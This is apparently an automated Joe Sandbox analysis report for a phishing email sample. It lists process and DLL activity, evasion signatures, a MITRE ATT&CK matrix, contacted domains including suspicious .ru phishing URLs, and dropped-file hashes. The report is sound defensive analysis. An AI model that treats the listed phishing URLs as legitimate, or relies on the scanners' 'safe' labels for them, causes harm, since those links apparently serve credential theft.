              Source: unknown  Process created: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exe "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exe" -ServerName:microsoft.windowslive.manageaccounts.AppXdbf3yp5apt3t7q877db3gnz5zqpf71zj.mca
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: ntmarta.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: urlmon.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: srvcli.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: netutils.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dxgi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: office.ui.xaml.hxaccounts.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: d3d11.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.storage.applicationdata.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: d3d10warp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dxcore.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: hxcomm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: cryptsp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: d2d1.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dwrite.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.applicationmodel.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.globalization.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: bcp47mrm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: textshaping.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: profapi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.networking.connectivity.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.networking.hostname.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.energy.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: rmclient.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.storage.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: wldp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: rometadata.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.system.diagnostics.telemetry.platformtelemetryclient.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: hxcommmodel.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: mrmcorer.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.staterepositoryclient.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.shell.servicehostbuilder.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: execmodelproxy.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: uiamanager.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.ui.core.textinput.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.ui.immersive.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dataexchange.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: cryptbase.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.accountscontrol.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: xmllite.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.security.authentication.web.core.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: userenv.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: profext.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: directmanipulation.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: winrttracing.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vaultcli.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: microsoftaccountwamextension.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.web.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dpapi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: hxoutlook.resources.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: msftedit.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: globinputhost.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.ui.xaml.controls.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windowscodecs.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: execmodelclient.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: wuceffects.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: threadpoolwinrt.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Window found: window name: SysTabControl32
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exe | File opened: C:\Windows\SYSTEM32\msftedit.dll
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935} DeviceTicket
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match | File source: 1.3.d.script.csv, type: HTML
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | File Volume queried: C:\Windows\SysWOW64 FullSizeInformation
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process information queried: ProcessInformation
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe | Queries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe | Queries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\images\offsym.ttf VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe | Queries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsym.ttf VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe | Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exe | Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              MITRE ATT&CK matrix, one line per tactic (a leading number is the report's count of matched signatures for that technique; techniques without a number were not matched):

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
              Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd
              Persistence: 21 Browser Extensions; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
              Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
              Defense Evasion: 11 Masquerading; 1 Modify Registry; 1 Process Injection; 1 DLL Side-Loading; 1 File Deletion
              Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
              Discovery: 1 Process Discovery; 1 File and Directory Discovery; 14 System Information Discovery; System Network Configuration Discovery; Internet Connection Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
              Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
              Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              https://qnj64b.cuisbp.ru/loray$68hba2u | 0% | Avira URL Cloud | safe |
              https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/ | 0% | Avira URL Cloud | safe |
              https://a.nel.cloudflare.com/report/v4?s=90lpMl7Mac9wXVL3CCWCwLlkaazUjV%2FAakqPfI%2BnTr3i3NwmI3T20R1QCSXhOeDdXfGm4wpD19oQ%2FP2eqnEHZu2MW0XHJR6oupfZDcm4uef7WamQSFT1B%2FWUHYFy | 0% | Avira URL Cloud | safe |
              https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/favicon.ico | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
a.nel.cloudflare.com | 35.190.80.1 | true | false | | high
cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru | 188.114.97.3 | true | false | | unknown
code.jquery.com | 151.101.130.137 | true | false | | high
developers.cloudflare.com | 104.16.6.189 | true | false | | high
cdnjs.cloudflare.com | 104.17.25.14 | true | false | | high
challenges.cloudflare.com | 104.18.95.41 | true | false | | high
mjj6bxg1xo.moydovv.com | 104.21.80.1 | true | false | | unknown
www.google.com | 142.250.186.164 | true | false | | high
s-0005.dual-s-msedge.net | 52.123.128.14 | true | false | | high
qnj64b.cuisbp.ru | 188.114.96.3 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/favicon.ico | false | Avira URL Cloud: safe | unknown
https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/ | false | Avira URL Cloud: safe | unknown
https://a.nel.cloudflare.com/report/v4?s=90lpMl7Mac9wXVL3CCWCwLlkaazUjV%2FAakqPfI%2BnTr3i3NwmI3T20R1QCSXhOeDdXfGm4wpD19oQ%2FP2eqnEHZu2MW0XHJR6oupfZDcm4uef7WamQSFT1B%2FWUHYFy | false | Avira URL Cloud: safe | unknown
https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/#madmin%40weareworkspace.com | false | | unknown
https://code.jquery.com/jquery-3.6.0.min.js | false | | high
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js | false | | high
https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/#contact | false | | unknown
https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback | false | | high
https://developers.cloudflare.com/favicon.png | false | | high
https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js | false | | high
https://qnj64b.cuisbp.ru/loray$68hba2u | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.186.46 | unknown | United States | 15169 | GOOGLEUS | false
52.109.89.18 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
216.58.206.78 | unknown | United States | 15169 | GOOGLEUS | false
104.16.5.189 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.21.80.1 | mjj6bxg1xo.moydovv.com | United States | 13335 | CLOUDFLARENETUS | false
151.101.130.137 | code.jquery.com | United States | 54113 | FASTLYUS | false
142.250.185.163 | unknown | United States | 15169 | GOOGLEUS | false
199.232.214.172 | bg.microsoft.map.fastly.net | United States | 54113 | FASTLYUS | false
20.42.73.26 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
104.16.6.189 | developers.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
35.190.80.1 | a.nel.cloudflare.com | United States | 15169 | GOOGLEUS | false
142.250.184.227 | unknown | United States | 15169 | GOOGLEUS | false
66.102.1.84 | unknown | United States | 15169 | GOOGLEUS | false
142.250.186.35 | unknown | United States | 15169 | GOOGLEUS | false
1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false
52.109.68.130 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
104.18.95.41 | challenges.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
52.123.128.14 | s-0005.dual-s-msedge.net | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
2.16.164.16 | unknown | European Union | 20940 | AKAMAI-ASN1EU | false
188.114.97.3 | cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru | European Union | 13335 | CLOUDFLARENETUS | false
52.109.28.47 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
188.114.96.3 | qnj64b.cuisbp.ru | European Union | 13335 | CLOUDFLARENETUS | false
142.250.186.164 | www.google.com | United States | 15169 | GOOGLEUS | false
104.17.25.14 | cdnjs.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
                                                  IP
                                                  192.168.2.17
                                                  192.168.2.5
                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1641469
                                                  Start date and time:2025-03-18 09:58:03 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:23
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • EGA enabled
                                                  Analysis Mode:stream
                                                  Analysis stop reason:Timeout
                                                  Sample name:Attached_image+from+ADMIN@weareworkspace.com.eml
                                                  Detection:MAL
                                                  Classification:mal88.phis.evad.winEML@28/15@24/104
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .eml
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 52.109.28.47, 2.16.164.16, 2.16.164.121, 199.232.214.172, 52.123.128.14, 40.126.31.2
                                                  • Excluded domains from analysis (whitelisted): ecs.office.com, omex.cdn.office.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, eur.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, uks-azsc-000.roaming.officeapps.live.com, login.live.com, ecs.office.trafficmanager.net, c.pki.goog, omex.cdn.office.net.akamaized.net, wu-b-net.trafficmanager.net, a1864.dscd.akamai.net
• Not all processes were analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                  • Report size getting too big, too many NtOpenKey calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtSetValueKey calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru
                                                  Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2684
                                                  Entropy (8bit):3.893756697297494
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:AA8D08E623CA623BB66D3E43626C399B
                                                  SHA1:13464BB54A7FC87B46B914FAB02480FECECC5DA3
                                                  SHA-256:E0C715E99B082D8F27730A52181287B426F421EA034607D4DF197C2489145E8B
                                                  SHA-512:DE52886B3131FB9A623DD3CF3C6DD65E51D60DA69188D868E046FAD99D9AE84FE7353CBB58DC0BB1E14BA0F76226CA0F1231F2060EFA10772B5739EEABD6B8E0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".R.l.E.x.e.9.k.M.K.K.i.j.b.B.7.5.J.q.S.K.c.l.w.j.E.n.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".9.m.a.f.h.b.W.2.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.m.5.Z.F.Y.y.
                                                  Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):181342
                                                  Entropy (8bit):5.29576200105165
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5226B8EB13DCB05321329A6CFC7CF6F1
                                                  SHA1:0FCA7A442051151B2202123AEE5E505E77BDF827
                                                  SHA-256:EB5FF380D190EFDF9AE9007C9FEDBE9BA7AB254C34A6DCAC0A4217935235694D
                                                  SHA-512:9A3CF6C70C2AB7FAA709F9F18F126FA1B330C20D2F6BEDB104B003EAC693278C77B163601CD4A4C3EE232C86D2BFFEE6FACBF3518A498A5D180D05E793BAFCC5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2025-03-18T08:59:24">.. Build: 16.0.18413.40127-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results?fullframe=yes</o:url>.. <o:ticket o:policy="DELEGATION" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Bearer {}" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.Resourc
                                                  Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):0.12527680355609347
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:08067627EE7344EE2EBF233C343ED670
                                                  SHA1:2C952F22AF172B1664E9778D723783BC1B2C2FDE
                                                  SHA-256:544D5747078ED5BB7EED8D862A45D9E9E55AE054D5B3AF6E57B682A456A89261
